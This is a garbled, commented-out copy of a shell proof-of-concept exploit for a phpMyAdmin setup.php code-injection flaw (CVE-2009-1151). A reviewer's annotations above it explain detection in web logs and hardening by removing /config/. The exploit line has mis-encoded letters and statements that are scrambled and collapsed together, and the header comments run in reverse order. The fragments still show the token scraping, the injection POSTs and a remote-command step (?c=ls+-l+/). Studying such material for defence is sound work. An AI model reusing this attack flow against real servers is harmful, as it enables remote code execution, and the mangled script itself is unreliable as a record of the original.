
# NOTE(review): the line below is an extraction-garbled copy of the PoC body.
# Its statements are collapsed onto one line and are out of their original order.
# Several leading letters are mis-encoded (e.g. "Įcho", "Ĭurl", "įlag").
# The line starts with '#', so a shell reads all of it as a single comment;
# nothing in it executes as written.
#
# What the visible fragments show, read for detection and hardening:
#   - a token is scraped from "$1/scripts/setup.php" (curl | grep | cut);
#   - two POSTs go to "$3/scripts/setup.php" carrying token, action=save and a
#     "configuration" field (the serialized payload is truncated on this page);
#   - "$3/config/" is then fetched and grepped for "phpinfo()" as the success
#     check, and the messages refer to "c=" and "p=" query parameters there.
#   In web logs this presumably appears as POSTs to /scripts/setup.php followed
#   by GETs to /config/ carrying c= or p= — confirm against the server's own
#   access-log format.
#   The page's header comment states the attack needs the /config/ directory to
#   still exist, so removing it (and the setup script) after installation takes
#   away that precondition.
#
# Script-hygiene points visible in the fragments:
#   - cookiejar and flag are built as /tmp/<name>.$RANDOM-style paths rather
#     than with mktemp, so the file names are guessable;
#   - "-k" in "-ks" turns off TLS certificate verification;
#   - "-url" is not a curl option spelling I can confirm ("--url" is); it is
#     presumably extraction damage — TODO confirm against the original script.
#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null Token=`curl -ks -c $cookiejar -url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`Įcho " checking if phpMyAdmin exists on URL provided. i.e.:"Įcho " $3/config/?c=ls+-l+/"Įcho " $3/config/?p=phpinfo() "Įcho " please send any feedback/improvements for this script to" ""Įcho " no luck injecting to $3/config/ :("Ĭookiejar="/tmp/$(basename $0).$RANDOM.txt" If curl -ks -url "$3/config/" | grep "phpinfo()" >/dev/nullĬurl -ks -url "$3/config/" >$flagĮcho " success! phpinfo() injected successfully! output saved on $flag"Ĭurl -ks -b $2 -d $postdata2 -url "$3/scripts/setup.php" >/dev/nullĮcho " you *should* now be able to remotely run shell commands and PHP code using your browser. "Ĭurl -ks -b $2 -d "$postdata" -url "$3/scripts/setup.php" >/dev/null Postdata="token=$1&action=save&configuration=""a:1:&eoltype=unix"įlag="/tmp/$(basename $0).$"Įcho " attempting to inject phpinfo(). # where ‘/scripts/setup.php‘ tries to create ‘‘ which is whereĮcho "sorry but you need curl for this script to work!"Įcho "on Debian/Ubuntu: sudo apt-get install curl"


# (The header fragments below were extracted in reverse order; read them bottom-up.)
# 3) administrator must NOT have deleted the '/config/' directory
# the *wizard* method, rather than manual method:
# where the administrator has chosen to install phpMyAdmin following
# 2) it *seems* this vuln can only be exploited against environments
# PoC script successfully tested on the following targets:
# and to str0ke () for testing this PoC script and providing feedback!
# special thanks to Greg Ose () for discovering such a cool vuln,
# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# 漏洞描述 (vulnerability description): Insufficient output sanitizing when generating configuration file
